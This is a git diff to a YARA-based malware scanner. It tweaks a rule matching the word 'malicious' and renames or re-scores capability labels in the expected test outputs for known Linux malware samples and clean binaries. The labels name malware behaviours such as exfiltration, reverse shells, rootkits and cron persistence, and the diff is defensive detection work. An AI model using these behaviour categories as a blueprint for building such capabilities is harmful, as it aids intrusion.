--- a/rules/sus/malicious.yara +++ b/rules/sus/malicious.yara @@ -5,8 +5,9 @@ rule malicious: medium { strings: $ref = /[a-zA-Z\-_ ]{0,16}malicious[a-zA-Z\-_ ]{0,16}/ fullword + $not_sshd = "attempt by a malicious server" condition: - any of them + $ref and none of ($not*) } rule malici0us: high { diff --git a/tests/does-nothing/does-nothing.simple b/tests/does-nothing/does-nothing.simple index af4355d54..605a4d85a 100644 --- a/tests/does-nothing/does-nothing.simple +++ b/tests/does-nothing/does-nothing.simple @@ -1,8 +1,8 @@ # does-nothing/does-nothing: medium data/encoding/base64: low data/encoding/json: low -discover/system/cpu_info: low -discover/system/hostname_get: low +discover/system/cpu: low +discover/system/hostname: low discover/system/platform: low exec/plugin: low exec/program: medium diff --git a/tests/javascript/2022.an-instance.99.10.9/index.js.simple b/tests/javascript/2022.an-instance.99.10.9/index.js.simple index 3f22ff99b..75c6f215c 100644 --- a/tests/javascript/2022.an-instance.99.10.9/index.js.simple +++ b/tests/javascript/2022.an-instance.99.10.9/index.js.simple @@ -2,7 +2,7 @@ anti-static/obfuscation/hex: medium data/encoding/json_encode: low discover/network/interface_list: medium -discover/system/hostname_get: low +discover/system/hostname: low discover/user/info: medium exfil/nodejs: critical fs/directory/list: low diff --git a/tests/javascript/clean/203.b7219352.chunk.js.simple b/tests/javascript/clean/203.b7219352.chunk.js.simple index 0e5568b9b..68bb087d0 100644 --- a/tests/javascript/clean/203.b7219352.chunk.js.simple +++ b/tests/javascript/clean/203.b7219352.chunk.js.simple @@ -8,6 +8,7 @@ data/encoding/json_encode: low discover/network/interface_list: medium discover/network/mac_address: medium discover/network/netstat: medium +discover/system/dmesg: low discover/system/platform: low discover/user/HOME: low discover/user/USER: low diff --git a/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple b/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple index 2804b9123..0be4faad4 100644 --- a/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple +++ b/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple @@ -23,7 +23,7 @@ discover/group/lookup: medium discover/process/egid: medium discover/process/parent: low discover/processes/list: medium -discover/system/hostname_get: low +discover/system/hostname: low discover/system/platform: low discover/user/HOME: low discover/user/USER: low diff --git a/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple b/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple index 698e87467..be7062b83 100644 --- a/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple +++ b/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple @@ -25,7 +25,7 @@ discover/group/lookup: medium discover/process/egid: medium discover/process/parent: low discover/processes/list: medium -discover/system/hostname_get: low +discover/system/hostname: low discover/system/platform: low discover/user/HOME: low discover/user/USER: low diff --git a/tests/javascript/clean/bash.js.simple b/tests/javascript/clean/bash.js.simple index 13532d334..dbfc0600a 100644 --- a/tests/javascript/clean/bash.js.simple +++ b/tests/javascript/clean/bash.js.simple @@ -1,9 +1,10 @@ # javascript/clean/bash.js: medium data/compression/bzip2: low data/compression/gzip: low +discover/multiple: medium discover/network/interface_list: medium discover/network/netstat: medium -discover/system/network: medium +discover/system/dmesg: low discover/system/platform: low discover/user/name_get: medium evasion/bypass_security/linux/se: medium diff --git a/tests/javascript/clean/highlight.esm.js.simple b/tests/javascript/clean/highlight.esm.js.simple index 253491788..ad9968262 100644 --- a/tests/javascript/clean/highlight.esm.js.simple +++ b/tests/javascript/clean/highlight.esm.js.simple @@ -23,7 +23,7 @@ discover/user/name_get: low exec/cmd: medium exec/plugin: low exec/program/background: low -exec/program/hidden: low +exec/program/hidden: medium exec/remote_commands/code_eval: medium exec/script/osa: medium exec/shell/SHELL: low diff --git a/tests/javascript/clean/highlight.js.simple b/tests/javascript/clean/highlight.js.simple index 9e9e58262..1d6cc7135 100644 --- a/tests/javascript/clean/highlight.js.simple +++ b/tests/javascript/clean/highlight.js.simple @@ -23,7 +23,7 @@ discover/user/name_get: low exec/cmd: medium exec/plugin: low exec/program/background: low -exec/program/hidden: low +exec/program/hidden: medium exec/remote_commands/code_eval: medium exec/script/osa: medium exec/shell/SHELL: low diff --git a/tests/javascript/clean/mode-php.js.simple b/tests/javascript/clean/mode-php.js.simple index 11134aafd..98840f39b 100644 --- a/tests/javascript/clean/mode-php.js.simple +++ b/tests/javascript/clean/mode-php.js.simple @@ -13,7 +13,7 @@ data/hash/md5: low data/random/insecure: low discover/process/egid: medium discover/process/parent: low -discover/system/hostname_get: low +discover/system/hostname: low discover/system/platform: low discover/user/USER: low discover/user/name_get: low diff --git a/tests/javascript/clean/mode-php_laravel_blade.js.simple b/tests/javascript/clean/mode-php_laravel_blade.js.simple index 095b10183..a5f1f66b8 100644 --- a/tests/javascript/clean/mode-php_laravel_blade.js.simple +++ b/tests/javascript/clean/mode-php_laravel_blade.js.simple @@ -13,7 +13,7 @@ data/hash/md5: low data/random/insecure: low discover/process/egid: medium discover/process/parent: low -discover/system/hostname_get: low +discover/system/hostname: low discover/system/platform: low discover/user/USER: low discover/user/name_get: low diff --git a/tests/javascript/clean/php.js.simple b/tests/javascript/clean/php.js.simple index 0b5239bd7..57a0b5396 100644 --- a/tests/javascript/clean/php.js.simple +++ b/tests/javascript/clean/php.js.simple @@ -11,7 +11,7 @@ data/encoding/reverse: low data/random/insecure: low discover/process/egid: medium discover/process/parent: low -discover/system/hostname_get: low +discover/system/hostname: low discover/system/platform: low discover/user/USER: low discover/user/name_get: low diff --git a/tests/javascript/clean/prism-bash.js.simple b/tests/javascript/clean/prism-bash.js.simple index 4a9c7f0a8..22517e6cc 100644 --- a/tests/javascript/clean/prism-bash.js.simple +++ b/tests/javascript/clean/prism-bash.js.simple @@ -1,9 +1,10 @@ # javascript/clean/prism-bash.js: medium data/compression/bzip2: low data/compression/gzip: low +discover/multiple: medium discover/network/interface_list: medium discover/network/netstat: medium -discover/system/network: medium +discover/system/dmesg: low discover/system/platform: low discover/user/name_get: medium evasion/bypass_security/linux/se: medium diff --git a/tests/javascript/clean/prism-bash.min.js.simple b/tests/javascript/clean/prism-bash.min.js.simple index b20adfcd2..7849e6737 100644 --- a/tests/javascript/clean/prism-bash.min.js.simple +++ b/tests/javascript/clean/prism-bash.min.js.simple @@ -1,9 +1,10 @@ # javascript/clean/prism-bash.min.js: medium data/compression/bzip2: low data/compression/gzip: low +discover/multiple: medium discover/network/interface_list: medium discover/network/netstat: medium -discover/system/network: medium +discover/system/dmesg: low discover/system/platform: low discover/user/name_get: medium evasion/bypass_security/linux/se: medium diff --git a/tests/javascript/clean/scripts.c88fecd373e21509.js.simple b/tests/javascript/clean/scripts.c88fecd373e21509.js.simple index 3c0d0badc..724f70e98 100644 --- a/tests/javascript/clean/scripts.c88fecd373e21509.js.simple +++ b/tests/javascript/clean/scripts.c88fecd373e21509.js.simple @@ -4,9 +4,10 @@ data/compression/bzip2: low data/compression/gzip: low data/encoding/json_decode: low data/encoding/json_encode: low +discover/multiple: medium discover/network/interface_list: medium discover/network/netstat: medium -discover/system/network: medium +discover/system/dmesg: low discover/system/platform: low discover/user/name_get: medium evasion/bypass_security/linux/se: medium diff --git a/tests/linux/2021.FontOnLake/45E9.elf.simple b/tests/linux/2021.FontOnLake/45E9.elf.simple index c637f8aae..78b178759 100644 --- a/tests/linux/2021.FontOnLake/45E9.elf.simple +++ b/tests/linux/2021.FontOnLake/45E9.elf.simple @@ -11,7 +11,8 @@ crypto/aes: low data/encoding/base64: low data/hash/md5: low discover/group/lookup: medium -discover/system/hostname_get: low +discover/system/dmesg: low +discover/system/hostname: low discover/user/HOME: low discover/user/USER: low evasion/bypass_security/linux/pam: medium @@ -20,6 +21,7 @@ evasion/file/location/x11_unix: low evasion/file/prefix: medium evasion/file/prefix/proc: high evasion/logging/acct: low +evasion/logging/dmesg: critical evasion/logging/failed_logins: medium evasion/logging/historical_logins: medium evasion/rootkit/refs: high @@ -58,7 +60,7 @@ fs/symlink_resolve: low fs/tempdir/create: low fs/tempdir/tempfile_create: low impact/remote_access/agent: medium -impact/remote_access/backdoor: high +impact/remote_access/backdoor: medium impact/remote_access/reverse_shell: medium impact/remote_access/ssh: high impact/rootkit: critical @@ -80,9 +82,9 @@ net/tcp/ssh: medium net/tun_tap: medium net/url/embedded: low persist/daemon: medium +persist/kernel_module/insert: high persist/kernel_module/kprobe: medium persist/kernel_module/module: medium -persist/kernel_module/module_load: medium persist/kernel_module/symbol_lookup: high persist/pid_file: medium process/chroot: low @@ -93,4 +95,3 @@ process/name_set: medium process/userid_set: low process/username_set: medium sus/ancient_gcc: medium -sus/malicious: medium diff --git a/tests/linux/2021.XMR-Stak/1b1a56.elf.simple b/tests/linux/2021.XMR-Stak/1b1a56.elf.simple index 0bc855b82..d33af9524 100644 --- a/tests/linux/2021.XMR-Stak/1b1a56.elf.simple +++ b/tests/linux/2021.XMR-Stak/1b1a56.elf.simple @@ -14,9 +14,9 @@ data/encoding/base64: low data/hash/blake2b: low data/hash/sha1: low data/random/insecure: low -discover/network/interface_get: low +discover/network/interface: low discover/process/runtime_deps: medium -discover/system/cpu_info: low +discover/system/cpu: low discover/system/platform: low discover/system/sysinfo: medium discover/user/HOME: low diff --git a/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple b/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple index 4448d98a5..0184dfa7d 100644 --- a/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple +++ b/tests/linux/2022.Symbiote/kerneldev.so.bkp.simple @@ -6,7 +6,7 @@ credential/keylogger: medium credential/password: low discover/network/interface_list: medium discover/system/platform: low -evasion/rootkit/linux_userspace: critical +evasion/rootkit/userspace: critical exec/dylib/symbol_address: medium exfil/stealer/pam: high fs/link_read: low diff --git a/tests/linux/2022.ez-pwnkit/payload.simple b/tests/linux/2022.ez-pwnkit/payload.simple index 944a8619e..c1c01e83a 100644 --- a/tests/linux/2022.ez-pwnkit/payload.simple +++ b/tests/linux/2022.ez-pwnkit/payload.simple @@ -1,7 +1,7 @@ # linux/2022.ez-pwnkit/payload: critical c2/addr/ip: medium -discover/system/cpu_info: low -discover/system/hostname_get: low +discover/system/cpu: low +discover/system/hostname: low discover/system/platform: low exec/plugin: low exec/program: medium diff --git a/tests/linux/2023.FreeDownloadManager/freedownloadmanager.sdiff b/tests/linux/2023.FreeDownloadManager/freedownloadmanager.sdiff index 6f4d79d1c..cf673d234 100644 --- a/tests/linux/2023.FreeDownloadManager/freedownloadmanager.sdiff +++ b/tests/linux/2023.FreeDownloadManager/freedownloadmanager.sdiff @@ -11,6 +11,7 @@ +anti-static/base64/exec +anti-static/base64/http_agent +data/base64/external ++data/embedded/base64_elf +data/embedded/base64_terms +data/embedded/base64_url +data/embedded/pgp_key @@ -28,7 +29,9 @@ +fs/path/usr_bin +fs/path/var +fs/permission/modify ++impact/remote_access/botnet +net/download +net/url/embedded -+persist/cron/echo_tab ++persist/cron/etc_d +persist/cron/tab ++sus/geopolitics diff --git a/tests/linux/2023.Kinsing/install.sh.simple b/tests/linux/2023.Kinsing/install.sh.simple index 1d1bb23b2..37a0c28f7 100644 --- a/tests/linux/2023.Kinsing/install.sh.simple +++ b/tests/linux/2023.Kinsing/install.sh.simple @@ -65,6 +65,7 @@ impact/remote_access/kill_rm: medium net/download: medium net/download/fetch: high net/url/embedded: low +persist/cron/etc_d: high persist/cron/tab: medium persist/daemon: medium persist/linux_multi: high diff --git a/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple b/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple index 71b80807d..a301fce64 100644 --- a/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple +++ b/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple @@ -16,8 +16,8 @@ data/compression/gzip: low data/encoding/base64: low data/hash/md5: low discover/network/netstat: medium -discover/system/cpu_info: low -discover/system/hostname_get: low +discover/system/cpu: low +discover/system/hostname: low discover/system/platform: low evasion/bypass_security/linux/se: medium evasion/bypass_security/linux/se_disable: high @@ -88,8 +88,6 @@ net/url/parse: low net/url/request: medium os/fd/sendfile: low os/kernel/netlink: low -persist/cron/echo_tab: high -persist/cron/hidden_tab: critical -persist/cron/tab: medium +persist/cron/tab: critical persist/daemon: medium process/groups_set: low diff --git a/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple b/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple index 27c58ccb8..3152b473a 100644 --- a/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple +++ b/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple @@ -14,8 +14,8 @@ data/encoding/base64: low data/encoding/json: low data/encoding/json_decode: low data/hash/md5: low -discover/system/cpu_info: low -discover/system/hostname_get: low +discover/system/cpu: low +discover/system/hostname: low discover/system/platform: low discover/user/HOME: low discover/user/USER: low diff --git a/tests/linux/2024.chisel/crondx.simple b/tests/linux/2024.chisel/crondx.simple index 3c58b6b40..3afefaff8 100644 --- a/tests/linux/2024.chisel/crondx.simple +++ b/tests/linux/2024.chisel/crondx.simple @@ -13,8 +13,8 @@ data/compression/gzip: low data/encoding/base64: low data/encoding/json: low data/hash/md5: low -discover/system/cpu_info: low -discover/system/hostname_get: low +discover/system/cpu: low +discover/system/hostname: low discover/system/platform: low exec/plugin: low exec/program: medium diff --git a/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple b/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple index a6f56798e..4210546ff 100644 --- a/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple +++ b/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple @@ -21,8 +21,8 @@ data/encoding/json_decode: low data/hash/md5: low discover/ip/public: high discover/processes/list: medium -discover/system/cpu_info: low -discover/system/hostname_get: low +discover/system/cpu: low +discover/system/hostname: low discover/user/HOME: low evasion/bypass_security/linux/pam: medium evasion/file/prefix: medium diff --git a/tests/linux/2024.gas/gas.simple b/tests/linux/2024.gas/gas.simple index 695a98f23..599e81b10 100644 --- a/tests/linux/2024.gas/gas.simple +++ b/tests/linux/2024.gas/gas.simple @@ -1,8 +1,8 @@ # linux/2024.gas/gas: high anti-behavior/LD_DEBUG: medium anti-behavior/LD_PROFILE: medium -discover/system/cpu_info: low -discover/system/dev_full: medium +discover/system/cpu: low +discover/system/dev_full: low discover/system/platform: low discover/system/sysinfo: medium evasion/hijack_execution/LD_LIBRARY_PATH: low diff --git a/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple b/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple index bd35f027d..f7983ea6d 100644 --- a/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple +++ b/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple @@ -31,10 +31,11 @@ data/encoding/json_decode: low data/hash/blake2b: low data/hash/md5: low data/hash/sha256: low +discover/network/connectivity: low discover/network/netstat: medium discover/processes/list: medium -discover/system/cpu_info: low -discover/system/hostname_get: low +discover/system/cpu: low +discover/system/hostname: low discover/system/platform: low discover/system/sysinfo: medium discover/user/HOME: low @@ -124,7 +125,6 @@ net/ip/host_port: medium net/ip/icmp: medium net/ip/multicast_send: low net/ip/parse: medium -net/ip/spoof: medium net/ip/tcp_state_tracker: medium net/proxy/shadowsocks: high net/proxy/socks5: medium diff --git a/tests/linux/2024.kworker_pretenders/gafgyt.simple b/tests/linux/2024.kworker_pretenders/gafgyt.simple index 3cbd303b1..709a44a35 100644 --- a/tests/linux/2024.kworker_pretenders/gafgyt.simple +++ b/tests/linux/2024.kworker_pretenders/gafgyt.simple @@ -6,6 +6,7 @@ credential/ssh/d: medium data/base64/external: medium data/encoding/base64: low evasion/file/location/dev_shm: medium +evasion/file/location/multiple: high evasion/file/location/var_run: medium evasion/file/location/var_tmp: medium evasion/mimicry/fake_process: critical @@ -26,6 +27,7 @@ fs/proc/self_exe: medium net/dns/servers: low net/http/request: low net/socket/send: low +persist/cron/etc_d: high persist/cron/tab: medium persist/daemon: medium process/executable_path: low diff --git a/tests/linux/2024.medusa/rkload.simple b/tests/linux/2024.medusa/rkload.simple index bac6337eb..af8c2f55f 100644 --- a/tests/linux/2024.medusa/rkload.simple +++ b/tests/linux/2024.medusa/rkload.simple @@ -4,8 +4,8 @@ anti-behavior/LD_DEBUG: medium anti-behavior/LD_PROFILE: medium anti-static/xor/commands: high credential/ssh/d: medium -discover/system/cpu_info: low -discover/system/dev_full: medium +discover/system/cpu: low +discover/system/dev_full: low discover/system/sysinfo: medium evasion/file/location/dev_shm: high evasion/file/location/lib: high @@ -15,7 +15,7 @@ evasion/file/prefix/dev: critical evasion/file/prefix/lib: high evasion/hijack_execution/LD_LIBRARY_PATH: low evasion/hijack_execution/etc_ld.so.preload: medium -evasion/rootkit/linux_userspace: critical +evasion/rootkit/userspace: critical exec/conditional/LANG: low exec/dylib/address_check: low exec/dylib/symbol_address: medium diff --git a/tests/linux/clean/appsec-rules.json.simple b/tests/linux/clean/appsec-rules.json.simple index 08541cf86..4a34603df 100644 --- a/tests/linux/clean/appsec-rules.json.simple +++ b/tests/linux/clean/appsec-rules.json.simple @@ -19,7 +19,8 @@ data/compression/bzip2: low data/compression/lzma: low data/compression/zstd: low data/encoding/base64: low -discover/system/network: medium +discover/multiple: medium +discover/system/dmesg: low discover/system/platform: low discover/user/name_get: medium evasion/bypass_security/linux/iptables: medium diff --git a/tests/linux/clean/busybox.simple b/tests/linux/clean/busybox.simple index 37746918e..d289770c8 100644 --- a/tests/linux/clean/busybox.simple +++ b/tests/linux/clean/busybox.simple @@ -8,11 +8,12 @@ data/compression/lzma: low data/encoding/base64: low data/random/insecure: low discover/group/lookup: medium -discover/network/interface_get: low +discover/network/interface: low discover/network/netstat: medium discover/process/parent: low discover/processes/pgrep: medium -discover/system/cpu_info: low +discover/system/cpu: low +discover/system/dmesg: low discover/system/platform: low discover/system/sysinfo: medium discover/user/HOME: low diff --git a/tests/linux/clean/caddy.simple b/tests/linux/clean/caddy.simple index 15ad1c190..fa1845840 100644 --- a/tests/linux/clean/caddy.simple +++ b/tests/linux/clean/caddy.simple @@ -39,8 +39,8 @@ discover/cloud/google_metadata: low discover/group/lookup: medium discover/network/mac_address: medium discover/process/parent: low -discover/system/cpu_info: low -discover/system/hostname_get: low +discover/system/cpu: low +discover/system/hostname: low discover/system/platform: medium discover/user/HOME: low discover/user/USER: low diff --git a/tests/linux/clean/chezmoi.simple b/tests/linux/clean/chezmoi.simple index 25f8dd578..97c25b8fa 100644 --- a/tests/linux/clean/chezmoi.simple +++ b/tests/linux/clean/chezmoi.simple @@ -47,8 +47,8 @@ data/random/insecure: low discover/group/lookup: medium discover/network/mac_address: medium discover/process/parent: low -discover/system/cpu_info: low -discover/system/hostname_get: low +discover/system/cpu: low +discover/system/hostname: low discover/system/platform: low discover/system/sysinfo: medium discover/user/HOME: low diff --git a/tests/linux/clean/chrome.simple b/tests/linux/clean/chrome.simple index f6058f27e..4dbc704d1 100644 --- a/tests/linux/clean/chrome.simple +++ b/tests/linux/clean/chrome.simple @@ -42,7 +42,7 @@ discover/process/name: medium discover/process/parent: low discover/process/runtime_deps: medium discover/processes/list: medium -discover/system/hostname_get: low +discover/system/hostname: low discover/system/platform: low discover/system/sysinfo: medium discover/user/HOME: low diff --git a/tests/linux/clean/clickhouse.simple b/tests/linux/clean/clickhouse.simple index f2ee677c1..bd77a7ee6 100644 --- a/tests/linux/clean/clickhouse.simple +++ b/tests/linux/clean/clickhouse.simple @@ -42,14 +42,15 @@ data/hash/sha256: low data/hash/whirlpool: medium data/random/insecure: low discover/cloud/google_metadata: low -discover/network/interface_get: low +discover/network/interface: low discover/network/interface_list: medium discover/permissions/capabilities: medium discover/process/name: medium discover/process/runtime_deps: medium discover/processes/list: medium -discover/system/cpu_info: low -discover/system/hostname_get: low +discover/system/cpu: low +discover/system/dmesg: low +discover/system/hostname: low discover/system/platform: low discover/user/HOME: low discover/user/USER: low @@ -70,7 +71,7 @@ exec/install_additional/package_install: medium exec/plugin: low exec/program: medium exec/program/background: low -exec/program/hidden: low +exec/program/hidden: medium exec/shell/SHELL: low exec/shell/TERM: low exec/shell/background_sleep: medium diff --git a/tests/linux/clean/code-oss.md b/tests/linux/clean/code-oss.md index 7ca00157c..8b39a12e5 100644 --- a/tests/linux/clean/code-oss.md +++ b/tests/linux/clean/code-oss.md @@ -2,7 +2,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_php_url_with_question) | contains hardcoded endpoint with a question mark | [http://autocomplete.nigma.ru/complete/query_help.php?suggest=true&q=](http://autocomplete.nigma.ru/complete/query_help.php?suggest=true&q=)
[http://search.incredibar.com/search.php?q=](http://search.incredibar.com/search.php?q=)
[http://searchfunmoods.com/results.php?q=](http://searchfunmoods.com/results.php?q=)
[https://m.so.com/index.php?ie=](https://m.so.com/index.php?ie=)
[https://search.privacywall.org/suggest.php?q=](https://search.privacywall.org/suggest.php?q=) | +| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_url_with_question) | binary contains hardcoded URL with question mark | [http://autocomplete.nigma.ru/complete/query_help.php?suggest=true&q=](http://autocomplete.nigma.ru/complete/query_help.php?suggest=true&q=)
[http://search.incredibar.com/search.php?q=](http://search.incredibar.com/search.php?q=)
[http://search.sweetim.com/search.asp?q=](http://search.sweetim.com/search.asp?q=)
[http://searchfunmoods.com/results.php?q=](http://searchfunmoods.com/results.php?q=)
[http://start.sweetpacks.com/search.asp?q=](http://start.sweetpacks.com/search.asp?q=)
[https://m.so.com/index.php?ie=](https://m.so.com/index.php?ie=)
[https://search.privacywall.org/suggest.php?q=](https://search.privacywall.org/suggest.php?q=) | | MEDIUM | [3P/threat_hunting/google_remote_desktop](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#Google_Remote_Desktop_greyware_tool_keyword) | [references 'Google Remote Desktop' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [inomeogfingihgjfjlpeplalcfajhgai](https://github.com/search?q=inomeogfingihgjfjlpeplalcfajhgai&type=code) | | MEDIUM | [3P/threat_hunting/proxmark](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#Proxmark_offensive_tool_keyword) | [references 'Proxmark' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [ProxMark](https://github.com/search?q=ProxMark&type=code) | | MEDIUM | [anti-behavior/LD_DEBUG](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/LD_DEBUG.yara#env_LD_DEBUG) | Checks if dynamic linker debugging is enabled | [LD_DEBUG](https://github.com/search?q=LD_DEBUG&type=code) | @@ -35,6 +35,7 @@ | MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [ExecuteCommandLists](https://github.com/search?q=ExecuteCommandLists&type=code)
[_executeCommand](https://github.com/search?q=_executeCommand&type=code)
[execCommand](https://github.com/search?q=execCommand&type=code)
[vkCmdExecuteCommands](https://github.com/search?q=vkCmdExecuteCommands&type=code) | | MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | | MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execvp](https://github.com/search?q=execvp&type=code) | +| MEDIUM | [exec/program/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/hidden.yara#relative_hidden_launcher) | relative hidden launcher | [./.691.9B](https://github.com/search?q=.%2F.691.9B&type=code)
[bash](https://github.com/search?q=bash&type=code)
[exec](https://github.com/search?q=exec&type=code)
[system](https://github.com/search?q=system&type=code) | | MEDIUM | [exec/shell/pipe_sh](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/pipe_sh.yara#pipe_to_shell) | pipes to shell | [| sh](https://github.com/search?q=%7C+sh&type=code) | | MEDIUM | [exec/tty/pathname](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/tty/pathname.yara#ttyname) | returns the pathname of a terminal device | [ttyname](https://github.com/search?q=ttyname&type=code) | | MEDIUM | [exfil/office_file_ext](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/office_file_ext.yara#office_extensions) | References multiple Office file extensions (possible exfil) | [docx](https://github.com/search?q=docx&type=code)
[eml](https://github.com/search?q=eml&type=code)
[ppt](https://github.com/search?q=ppt&type=code)
[pst](https://github.com/search?q=pst&type=code)
[xlsx](https://github.com/search?q=xlsx&type=code) | @@ -103,9 +104,9 @@ | LOW | [data/encoding/json_encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-encode.yara#JSONEncode) | encodes JSON | [JSON.stringify](https://github.com/search?q=JSON.stringify&type=code) | | LOW | [data/hash/sha1](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha1.yara#SHA1) | Uses the SHA1 signature format | [SHA1_](https://github.com/search?q=SHA1_&type=code) | | LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | -| LOW | [discover/network/interface_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-get.yara#bsd_if) | get network interfaces by name or index | [if_indextoname](https://github.com/search?q=if_indextoname&type=code)
[if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | +| LOW | [discover/network/interface](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface.yara#bsd_if) | get network interfaces by name or index | [if_indextoname](https://github.com/search?q=if_indextoname&type=code)
[if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | | LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | -| LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | +| LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
